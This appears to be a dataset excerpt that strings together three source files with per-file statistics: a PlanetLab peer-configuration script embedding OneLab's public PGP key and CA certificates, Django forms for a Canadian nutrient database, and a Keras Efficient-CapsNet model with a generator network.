'ignore_cmd_errors': False,
'always_update': False})
AddConfFileToNodeGroup(conf_file_id, 'Rollout')
# Add OneLab as a peer
onelab = {'peername': 'OneLab', 'peer_url': 'https://onelab-plc.inria.fr/PLCAPI/', 'key': '-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.4.5 (GNU/Linux)\n\nmQGiBEW0kJMRBACaTlrW0eYlQwkzRuMFfEYMwyqBT9Bm6R4g68SJ5GdjCRu3XCnd\nGTGCFF4ewOu6IcUmZDv39eqxShBWyx+JqBogYPGNvPrj07jXXKaSBCM7TPk+9kMW\nPziIxSClvO15XaPKv89c6kFaEBe0z1xsoMB/TNoLmhFUxmc24O7JnEqmYwCgjzIS\nHP7u9KIOYk1ZlTdOtwyRxVkD/1uYbPzD0Qigf8uF9ADzx7I4F1ATd2ezYq0EfzhD\nTDa15FPWwA7jm+Mye//ovT01Ju6JQtCU4N9wRsV2Yy2tWcWFZiYt+BISPVS0lJDx\nQ2Cd2+kEWyl9ByL9/ACHmCUz0OOaz9j1x+GpJLArjUdZSJOs68kPw90F62mrLHfg\nYCHpA/0ZcdJQG9QYNZ67KMFqNPho+uRww5/7kxQ4wkSyP7EK3QUVgXG5OWZ/1mPZ\njon9N04nnjrL9qoQv7m04ih3rmqyGy1MsicNCoys0RNh1eavPdAsXD1ZEXnWPA7z\naC37hxUaRPP3hH+1ifjPpAWQX1E89MK2y2zQpZipvEOAO2Lw8LRCT25lTGFiIENl\nbnRyYWwgKGh0dHA6Ly9vbmVsYWItcGxjLmlucmlhLmZyLykgPHN1cHBvcnRAb25l\nLWxhYi5vcmc+iGAEExECACAFAkW0kJMCGyMGCwkIBwMCBBUCCAMEFgIDAQIeAQIX\ngAAKCRBuu7E0vzFd9fvbAJ9QB2neTSbAN5HuoigIbuKzTUCTjQCeM/3h7/OmjD+z\n6yXtWD4Fzyfr7fSIYAQTEQIAIAUCRbibbAIbIwYLCQgHAwIEFQIIAwQWAgMBAh4B\nAheAAAoJEG67sTS/MV31w3AAn2t6qb94HIPmqCoD/ptK34Dv+VW0AJ4782ffPPnk\nbVXHU/Sx31QCoFmj34hgBBMRAgAgBQJFtJJBAhsjBgsJCAcDAgQVAggDBBYCAwEC\nHgECF4AACgkQbruxNL8xXfU5UQCeKqXWeNzTqdMqj/qHPkp1JCb+isEAn2AzDnde\nITF0aYd02RAKsU4sKePEtEJPbmVMYWIgQ2VudHJhbCAoaHR0cDovL29uZWxhYi1w\nbGMuaW5yaWEuZnIvKSA8c3VwcG9ydEBvbmUtbGFiLm9yZz6IYAQTEQIAIAUCRbi2\npgIbIwYLCQgHAwIEFQIIAwQWAgMBAh4BAheAAAoJEG67sTS/MV31W4AAn0rW5yjR\n2a8jPP/V44gw1JhqnE8jAKCMAEh0nPjvle5oLEGectC3Es9Pm7kBDQRFtJCUEAQA\nhp38fNVy/aJiPg2lUKKnA6KjrRm3LxD66N8MSWfxGCIYzQRJHhmZWnS+m1DDOjdu\nFG9FM6QrsCRRcEQuvhKI2ORFfK75D24lj4QaXzw7vfBbAibTaDsYa0b5LxfR5pGj\nYPCQ5LrRex+Ws3DrB3acJE5/XnYJZ+rUO1ZJlm00FTMAAwUD/Ai4ZUunVB8F0VqS\nhJgDYQF08/OlAnDAcbL//P5dtXdztUNSgXZM4wW/XFnDvAsBuRnbfkT/3BeptM9L\neEbdrMi4eThLstSl13ITOsZbSL3i/2OO9sPAxupWzRWOXcQILpqR2YMRK1EapO+M\nNhjrgxU9JpMXz24FESocczSyywDXiEkEGBECAAkFAkW0kJQCGwwACgkQbruxNL8x\nXfXGxQCfZqzSqinohParWaHv+4XNoIz2B7IAn2Ge0O5wjYZeV/joulkTXfPKm7Iu\n=SsZg\n-----END PGP PUBLIC KEY BLOCK-----\n', 'cacert': 'Certificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number: 67109883 (0x40003fb)\r\n Signature Algorithm: sha1WithRSAEncryption\r\n Issuer: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=G\r\n Validity\r\n Not Before: Mar 14 20:30:00 2006 GMT\r\n Not After : Mar 14 23:59:00 2013 GMT\r\n Subject: C=BE, O=Cybertrust, OU=Educational CA, CN=Cybertrust Educationa\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n RSA Public Key: (2048 bit)\r\n Modulus (2048 bit):\r\n 00:95:22:a1:10:1d:4a:46:60:6e:05:91:9b:df:83:\r\n c2:ed:12:b2:5a:7c:f8:ab:e1:f8:50:5c:28:2c:7e:\r\n 7e:00:38:93:b0:8b:4a:f1:c2:4c:3c:10:2c:3c:ef:\r\n b0:ec:a1:69:2f:b9:fc:cc:08:14:6b:8d:4f:18:f3:\r\n 83:d2:fa:a9:37:08:20:aa:5c:aa:80:60:a2:d5:a5:\r\n 22:00:cf:5a:e5:b4:97:df:ba:1e:be:5c:8e:17:19:\r\n 66:fd:af:9f:7c:7b:89:b2:0e:24:d8:c7:ab:63:c4:\r\n 95:32:8d:48:e6:63:59:7d:04:b8:33:a8:bd:d7:5d:\r\n 64:bc:63:b5:f7:4d:28:fd:f9:06:72:31:5c:ba:45:\r\n 94:65:a3:d2:b4:58:ec:3b:61:58:44:a3:2f:62:b3:\r\n 9b:80:b4:82:fd:d5:c7:cc:51:25:e5:95:3f:47:2f:\r\n 30:7b:ac:c8:78:6e:e2:e1:6d:27:eb:3d:cc:01:82:\r\n e8:35:77:8d:ab:58:bb:55:d1:d5:a4:81:56:8d:1c:\r\n d0:14:b1:b0:06:de:a0:91:22:f3:f0:a8:34:17:47:\r\n c6:e0:3e:f6:0c:5a:ac:7e:50:4b:cd:e1:69:6e:06:\r\n fc:06:7e:6a:4d:b4:95:99:a0:59:5c:35:66:ec:d9:\r\n 49:d4:17:e0:60:b0:5d:a5:d7:1a:e2:2a:6e:66:f2:\r\n af:1d\r\n Exponent: 65537 (0x10001)\r\n X509v3 extensions:\r\n X509v3 CRL Distribution Points: \r\n URI:http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl\r\n\r\n X509v3 Subject Key Identifier: \r\n 65:65:A3:3D:D7:3B:11:A3:0A:07:25:37:C9:42:4A:5B:76:77:50:E1\r\n X509v3 Certificate Policies: \r\n Policy: 1.3.6.1.4.1.6334.1.0\r\n CPS: http://www.public-trust.com/CPS/OmniRoot.html\r\n\r\n X509v3 Authority Key Identifier: \r\n DirName:/C=US/O=GTE Corporation/OU=GTE CyberTrust Solutions, Inc\r\n serial:01:A5\r\n\r\n X509v3 Key Usage: critical\r\n Certificate Sign, CRL Sign\r\n X509v3 Basic Constraints: critical\r\n CA:TRUE, pathlen:0\r\n Signature Algorithm: sha1WithRSAEncryption\r\n 43:b3:45:83:54:71:c4:1f:dc:b2:3c:6b:4e:bf:26:f2:4e:f2:\r\n ad:9a:5b:fa:86:37:88:e8:14:6c:41:18:42:5f:ef:65:3e:eb:\r\n 03:77:a0:b7:9e:75:7a:51:7c:bb:15:5b:b8:af:91:a0:34:92:\r\n 53:ed:7f:2a:49:84:ac:b9:80:4b:b5:c7:b2:23:22:fb:eb:d8:\r\n fb:6e:c9:3c:f3:d2:d1:bb:be:c9:1c:ff:6d:01:db:69:80:0e:\r\n 99:a5:ea:9e:7b:97:98:8f:b7:cf:22:9c:b3:b8:5d:e5:a9:33:\r\n 17:74:c6:97:37:0f:b4:e9:26:82:5f:61:0b:3f:1e:3d:64:e9:\r\n 2b:9b\r\n-----BEGIN CERTIFICATE-----\r\nMIIEQjCCA6ugAwIBAgIEBAAD+zANBgkqhkiG9w0BAQUFADB1MQswCQYDVQQGEwJV\r\nUzEYMBYGA1UEChMPR1RFIENvcnBvcmF0aW9uMScwJQYDVQQLEx5HVEUgQ3liZXJU\r\ncnVzdCBTb2x1dGlvbnMsIEluYy4xIzAhBgNVBAMTGkdURSBDeWJlclRydXN0IEds\r\nb2JhbCBSb290MB4XDTA2MDMxNDIwMzAwMFoXDTEzMDMxNDIzNTkwMFowXzELMAkG\r\nA1UEBhMCQkUxEzARBgNVBAoTCkN5YmVydHJ1c3QxFzAVBgNVBAsTDkVkdWNhdGlv\r\nbmFsIENBMSIwIAYDVQQDExlDeWJlcnRydXN0IEVkdWNhdGlvbmFsIENBMIIBIjAN\r\nBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlSKhEB1KRmBuBZGb34PC7RKyWnz4\r\nq+H4UFwoLH5+ADiTsItK8cJMPBAsPO+w7KFpL7n8zAgUa41PGPOD0vqpNwggqlyq\r\ngGCi1aUiAM9a5bSX37oevlyOFxlm/a+ffHuJsg4k2MerY8SVMo1I5mNZfQS4M6i9\r\n111kvGO1900o/fkGcjFcukWUZaPStFjsO2FYRKMvYrObgLSC/dXHzFEl5ZU/Ry8w\r\ne6zIeG7i4W0n6z3MAYLoNXeNq1i7VdHVpIFWjRzQFLGwBt6gkSLz8Kg0F0fG4D72\r\nDFqsflBLzeFpbgb8Bn5qTbSVmaBZXDVm7NlJ1BfgYLBdpdca4ipuZvKvHQIDAQAB\r\no4IBbzCCAWswRQYDVR0fBD4wPDA6oDigNoY0aHR0cDovL3d3dy5wdWJsaWMtdHJ1\r\nc3QuY29tL2NnaS1iaW4vQ1JMLzIwMTgvY2RwLmNybDAdBgNVHQ4EFgQUZWWjPdc7\r\nEaMKByU3yUJKW3Z3UOEwUwYDVR0gBEwwSjBIBgkrBgEEAbE+AQAwOzA5BggrBgEF\r\nBQcCARYtaHR0cDovL3d3dy5wdWJsaWMtdHJ1c3QuY29tL0NQUy9PbW5pUm9vdC5o\r\ndG1sMIGJBgNVHSMEgYEwf6F5pHcwdTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD0dU\r\nRSBDb3Jwb3JhdGlvbjEnMCUGA1UECxMeR1RFIEN5YmVyVHJ1c3QgU29sdXRpb25z\r\nLCBJbmMuMSMwIQYDVQQDExpHVEUgQ3liZXJUcnVzdCBHbG9iYWwgUm9vdIICAaUw\r\nDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQAwDQYJKoZIhvcNAQEF\r\nBQADgYEAQ7NFg1RxxB/csjxrTr8m8k7yrZpb+oY3iOgUbEEYQl/vZT7rA3egt551\r\nelF8uxVbuK+RoDSSU+1/KkmErLmAS7XHsiMi++vY+27JPPPS0bu+yRz/bQHbaYAO\r\nmaXqnnuXmI+3zyKcs7hd5akzF3TGlzcPtOkmgl9hCz8ePWTpK5s=\r\n-----END CERTIFICATE-----\r\nCertificate:\r\n Data:\r\n Version: 1 (0x0)\r\n Serial Number: 421 (0x1a5)\r\n Signature Algorithm: md5WithRSAEncryption\r\n Issuer: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=GTE CyberTrust Global Root\r\n Validity\r\n Not Before: Aug 13 00:29:00 1998 GMT\r\n Not After : Aug 13 23:59:00 2018 GMT\r\n Subject: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc., CN=GTE CyberTrust Global Root\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n RSA Public Key: (1024 bit)\r\n Modulus (1024 bit):\r\n 00:95:0f:a0:b6:f0:50:9c:e8:7a:c7:88:cd:dd:17:\r\n 0e:2e:b0:94:d0:1b:3d:0e:f6:94:c0:8a:94:c7:06:\r\n c8:90:97:c8:b8:64:1a:7a:7e:6c:3c:53:e1:37:28:\r\n 73:60:7f:b2:97:53:07:9f:53:f9:6d:58:94:d2:af:\r\n 8d:6d:88:67:80:e6:ed:b2:95:cf:72:31:ca:a5:1c:\r\n 72:ba:5c:02:e7:64:42:e7:f9:a9:2c:d6:3a:0d:ac:\r\n 8d:42:aa:24:01:39:e6:9c:3f:01:85:57:0d:58:87:\r\n 45:f8:d3:85:aa:93:69:26:85:70:48:80:3f:12:15:\r\n c7:79:b4:1f:05:2f:3b:62:99\r\n Exponent: 65537 (0x10001)\r\n Signature Algorithm: md5WithRSAEncryption\r\n 6d:eb:1b:09:e9:5e:d9:51:db:67:22:61:a4:2a:3c:48:77:e3:\r\n a0:7c:a6:de:73:a2:14:03:85:3d:fb:ab:0e:30:c5:83:16:33:\r\n 81:13:08:9e:7b:34:4e:df:40:c8:74:d7:b9:7d:dc:f4:76:55:\r\n 7d:9b:63:54:18:e9:f0:ea:f3:5c:b1:d9:8b:42:1e:b9:c0:95:\r\n 4e:ba:fa:d5:e2:7c:f5:68:61:bf:8e:ec:05:97:5f:5b:b0:d7:\r\n a3:85:34:c4:24:a7:0d:0f:95:93:ef:cb:94:d8:9e:1f:9d:5c:\r\n 85:6d:c7:aa:ae:4f:1f:22:b5:cd:95:ad:ba:a7:cc:f9:ab:0b:\r\n 7a:7f\r\n-----BEGIN CERTIFICATE-----\r\nMIICWjCCAcMCAgGlMA0GCSqGSIb3DQEBBAUAMHUxCzAJBgNVBAYTAlVTMRgwFgYD\r\nVQQKEw9HVEUgQ29ycG9yYXRpb24xJzAlBgNVBAsTHkdURSBDeWJlclRydXN0IFNv\r\nbHV0aW9ucywgSW5jLjEjMCEGA1UEAxMaR1RFIEN5YmVyVHJ1c3QgR2xvYmFsIFJv\r\nb3QwHhcNOTgwODEzMDAyOTAwWhcNMTgwODEzMjM1OTAwWjB1MQswCQYDVQQGEwJV\r\nUzEYMBYGA1UEChMPR1RFIENvcnBvcmF0aW9uMScwJQYDVQQLEx5HVEUgQ3liZXJU\r\ncnVzdCBTb2x1dGlvbnMsIEluYy4xIzAhBgNVBAMTGkdURSBDeWJlclRydXN0IEds\r\nb2JhbCBSb290MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCVD6C28FCc6HrH\r\niM3dFw4usJTQGz0O9pTAipTHBsiQl8i4ZBp6fmw8U+E3KHNgf7KXUwefU/ltWJTS\r\nr41tiGeA5u2ylc9yMcqlHHK6XALnZELn+aks1joNrI1CqiQBOeacPwGFVw1Yh0X4\r\n04Wqk2kmhXBIgD8SFcd5tB8FLztimQIDAQABMA0GCSqGSIb3DQEBBAUAA4GBAG3r\r\nGwnpXtlR22ciYaQqPEh346B8pt5zohQDhT37qw4wxYMWM4ETCJ57NE7fQMh017l9\r\n3PR2VX2bY1QY6fDq81yx2YtCHrnAlU66+tXifPVoYb+O7AWXX1uw16OFNMQkpw0P\r\nlZPvy5TYnh+dXIVtx6quTx8itc2VrbqnzPmrC3p/\r\n-----END CERTIFICATE-----\r\n'}
AddPeer(onelab)
| 129.508897
| 17,210
| 0.835678
| 2,615
| 36,392
| 11.499426
| 0.305927
| 0.006385
| 0.005853
| 0.007682
| 0.122876
| 0.094543
| 0.079711
| 0.064414
| 0.060091
| 0.060091
| 0
| 0.108421
| 0.087602
| 36,392
| 280
| 17,211
| 129.971429
| 0.797223
| 0.056304
| 0
| 0.358382
| 0
| 0.017341
| 0.87173
| 0.699857
| 0
| 1
| 0.000992
| 0
| 0
| 1
| 0
| false
| 0.069364
| 0.011561
| 0
| 0.011561
| 0.011561
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
484eb883e98e133b19068b7ead86555eeaa224eb
| 3,710
|
py
|
Python
|
cnf_xplor/item_enter/forms.py
|
BFSSI-Bioinformatics-Lab/nutrition_database
|
ef63be35ceb4d37f3fa94bd6e4e8c8f3c84f8b7b
|
[
"MIT"
] | null | null | null |
cnf_xplor/item_enter/forms.py
|
BFSSI-Bioinformatics-Lab/nutrition_database
|
ef63be35ceb4d37f3fa94bd6e4e8c8f3c84f8b7b
|
[
"MIT"
] | 46
|
2020-02-17T18:50:49.000Z
|
2020-06-03T17:20:56.000Z
|
cnf_xplor/item_enter/forms.py
|
BFSSI-Bioinformatics-Lab/nutrition_database
|
ef63be35ceb4d37f3fa94bd6e4e8c8f3c84f8b7b
|
[
"MIT"
] | null | null | null |
import django.forms as forms
from cnf_xplor.api.models import Food, FoodGroup, FoodSource, Nutrient, ConversionFactor, Measure
class EnterFood(forms.ModelForm):
class Meta:
model = Food
fields = ["GROUP","SOURCE", "COUNTRY_C", "FOOD_DESC", "FOOD_DESC_F", "COMMENT_T", "FN_COMMENT_F"]
GROUP = forms.ModelChoiceField(queryset=FoodGroup.objects.order_by('GROUP_C'), widget=forms.Select(attrs={'class':'enter-item'}), required=False)
SOURCE = forms.ModelChoiceField(queryset=FoodSource.objects.order_by('SOURCE_C'), widget=forms.Select(attrs={'class':'enter-item'}), required=False)
COUNTRY_C = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'enter-item'}), required=False)
FOOD_DESC = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
FOOD_DESC_F = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
COMMENT_T = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
FN_COMMENT_F = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
#REASON_FOR_CHANGE = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
class UpdateFood(forms.ModelForm):
class Meta:
model = Food
fields = ["GROUP","SOURCE", "COUNTRY_C", "FOOD_DESC", "FOOD_DESC_F", "COMMENT_T", "FN_COMMENT_F"]
GROUP = forms.ModelChoiceField(queryset=FoodGroup.objects.order_by('GROUP_C'), widget=forms.Select(attrs={'class':'enter-item'}), required=False)
SOURCE = forms.ModelChoiceField(queryset=FoodSource.objects.order_by('SOURCE_C'), widget=forms.Select(attrs={'class':'enter-item'}), required=False)
COUNTRY_C = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'enter-item'}), required=False)
FOOD_DESC = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
FOOD_DESC_F = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
COMMENT_T = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
FN_COMMENT_F = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
REASON_FOR_CHANGE = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
class EnterNutrient(forms.ModelForm):
class Meta:
model = Nutrient
fields = ["NUTR_SYMBOL","NUTR_NAME", "NUTR_NAME_F", "UNIT"]
NUTR_SYMBOL = forms.CharField(widget=forms.TextInput(attrs={'class': 'enter-item'}), required=False)
NUTR_NAME = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
NUTR_NAME_F = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
UNIT = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
class EnterConversionFactor(forms.ModelForm):
class Meta:
model = ConversionFactor
fields = ["FOOD_C","MEASURE_ID", "CONV_FACTOR", "COMMENT_T", "CF_COMMENT_F"]
FOOD_C = forms.ModelChoiceField(queryset=Food.objects.order_by('FOOD_C'), widget=forms.Select(attrs={'class':'enter-item'}), required=False)
MEASURE_ID = forms.ModelChoiceField(queryset=Measure.objects.order_by('MEASURE_ID'), widget=forms.Select(attrs={'class':'enter-item'}), required=False)
CONV_FACTOR = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
COMMENT_T = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
CF_COMMENT_F = forms.CharField(widget=forms.TextInput(attrs={'class':'enter-item'}), required=False)
| 66.25
| 155
| 0.729919
| 470
| 3,710
| 5.623404
| 0.12766
| 0.104048
| 0.141884
| 0.17972
| 0.840333
| 0.819145
| 0.819145
| 0.819145
| 0.819145
| 0.800605
| 0
| 0
| 0.099461
| 3,710
| 55
| 156
| 67.454545
| 0.791081
| 0.028302
| 0
| 0.547619
| 0
| 0
| 0.169534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.047619
| 0
| 0.809524
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fcafe94992fe5fba631e6c4fe17add9d370bdb5
| 8,885
|
py
|
Python
|
models/efficient_capsnet_graph_AIS.py
|
whongfeiHK/AIS-curve-prediction-Deep-Learning
|
b1f321c6fa6fbd2c854e7d9d16953ca49519bc1a
|
[
"Apache-2.0"
] | 1
|
2022-01-13T16:41:01.000Z
|
2022-01-13T16:41:01.000Z
|
models/efficient_capsnet_graph_AIS.py
|
whongfeiHK/AIS-curve-prediction-Deep-Learning
|
b1f321c6fa6fbd2c854e7d9d16953ca49519bc1a
|
[
"Apache-2.0"
] | null | null | null |
models/efficient_capsnet_graph_AIS.py
|
whongfeiHK/AIS-curve-prediction-Deep-Learning
|
b1f321c6fa6fbd2c854e7d9d16953ca49519bc1a
|
[
"Apache-2.0"
] | 1
|
2022-01-16T06:33:28.000Z
|
2022-01-16T06:33:28.000Z
|
import numpy as np
import tensorflow as tf
from utils.layers import PrimaryCaps, FCCaps, Length, Mask
from keras import regularizers
def efficient_capsnet_graph(input_shape):
"""
Efficient-CapsNet graph architecture.
Parameters
----------
input_shape: list
network input shape
"""
inputs = tf.keras.Input(input_shape)
#x = tf.keras.layers.Conv2D(32,5,2,activation="relu", padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01), activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(inputs)
#x = tf.keras.layers.BatchNormalization()(x)
#x = tf.keras.layers.Conv2D(64,4,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
#x = tf.keras.layers.BatchNormalization()(x)
#x = tf.keras.layers.Conv2D(64,3,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
#x = tf.keras.layers.BatchNormalization()(x)
#x = tf.keras.layers.Conv2D(128,2,2,activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(x)
#x = tf.keras.layers.BatchNormalization()(x)
#x = PrimaryCaps(128, (18,11), 16, 8)(x)
x = tf.keras.layers.Conv2D(32,(4,3),2,activation="relu", padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01), activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(inputs)
x = tf.keras.layers.BatchNormalization()(x)
print (x.shape)
x = tf.keras.layers.Conv2D(32,3,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.Conv2D(64,3,2, activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.Conv2D(64,(3,2),activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01), kernel_initializer='he_normal')(x)
x = tf.keras.layers.BatchNormalization()(x)
print (x.shape)
x = tf.keras.layers.Conv2D(128,(2,1),activation='relu', padding='valid', kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),kernel_initializer='he_normal')(x)
x = tf.keras.layers.BatchNormalization()(x)
x = PrimaryCaps(128,(14,10), 16, 8)(x)
digit_caps = FCCaps(2,16)(x)
digit_caps_len = Length(name='length_capsnet_output')(digit_caps)
return tf.keras.Model(inputs=inputs,outputs=[digit_caps, digit_caps_len], name='Efficient_CapsNet')
def generator_graph(input_shape):
"""
Generator graph architecture.
Parameters
----------
input_shape: list
network input shape
"""
inputs = tf.keras.Input(16*2)
#x = tf.keras.layers.Dense(198)(inputs)
#x = tf.keras.layers.Reshape(target_shape=(18,11,1))(x)
#x = tf.keras.layers.UpSampling2D(size=(3,2), interpolation='bilinear')(x) #54,22
#x = tf.keras.layers.Conv2D(16, (2,4), (2,1), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #27,19
#x = tf.keras.layers.UpSampling2D(size=(3,3), interpolation='bilinear')(x) #81,57
#x = tf.keras.layers.Conv2D(16, (3,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #79,55
#x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #158,110
#x = tf.keras.layers.Conv2D(32, (3,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #156 105
#x = tf.keras.layers.Conv2D(32, (4,3), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #153 103
#x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #306, 206
#x = tf.keras.layers.Conv2D(16, (4,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x)
#x = tf.keras.layers.Conv2D(1, (4,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.sigmoid)(x) #300,200
x = tf.keras.layers.Dense(140)(inputs)
x = tf.keras.layers.Reshape(target_shape=(14,10,1))(x)
x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #28,20
x = tf.keras.layers.Conv2D(16, 3, kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #26,18
x = tf.keras.layers.UpSampling2D(size=(3,3), interpolation='bilinear')(x) #78,54
x = tf.keras.layers.Conv2D(16, 3, kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #76,52
x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #152,104
x = tf.keras.layers.Conv2D(32, (3,5), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #150 100
#x = tf.keras.layers.Conv2D(32, (4,3), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #153 103
#x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #306, 206
#x = tf.keras.layers.Conv2D(16, (4,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x)
x = tf.keras.layers.Conv2D(1, 1, kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.sigmoid)(x) #150,100
return tf.keras.Model(inputs=inputs, outputs=x, name='Generator')
def build_graph(input_shape, mode, verbose):
"""
Efficient-CapsNet graph architecture with reconstruction regularizer. The network can be initialize with different modalities.
Parameters
----------
input_shape: list
network input shape
mode: str
working mode ('train', 'test' & 'play')
verbose: bool
"""
inputs = tf.keras.Input(input_shape)
y_true = tf.keras.layers.Input(shape=(2,))
noise = tf.keras.layers.Input(shape=(2, 16))
efficient_capsnet = efficient_capsnet_graph(input_shape)
if verbose:
efficient_capsnet.summary()
print("\n\n")
digit_caps, digit_caps_len = efficient_capsnet(inputs)
noised_digitcaps = tf.keras.layers.Add()([digit_caps, noise]) # only if mode is play
masked_by_y = Mask()([digit_caps, y_true])
masked = Mask()(digit_caps)
masked_noised_y = Mask()([noised_digitcaps, y_true])
generator = generator_graph(input_shape)
if verbose:
generator.summary()
print("\n\n")
x_gen_train = generator(masked_by_y)
x_gen_eval = generator(masked)
x_gen_play = generator(masked_noised_y)
if mode == 'train':
return tf.keras.models.Model([inputs, y_true], [digit_caps_len, x_gen_train], name='Efficinet_CapsNet_Generator')
elif mode == 'test':
return tf.keras.models.Model(inputs, [digit_caps_len, x_gen_eval], name='Efficinet_CapsNet_Generator')
elif mode == 'play':
return tf.keras.models.Model([inputs, y_true, noise], [digit_caps_len, x_gen_play], name='Efficinet_CapsNet_Generator')
else:
raise RuntimeError('mode not recognized')
| 58.071895
| 241
| 0.715701
| 1,278
| 8,885
| 4.844288
| 0.115023
| 0.234049
| 0.254402
| 0.264578
| 0.833145
| 0.797125
| 0.763528
| 0.727992
| 0.695203
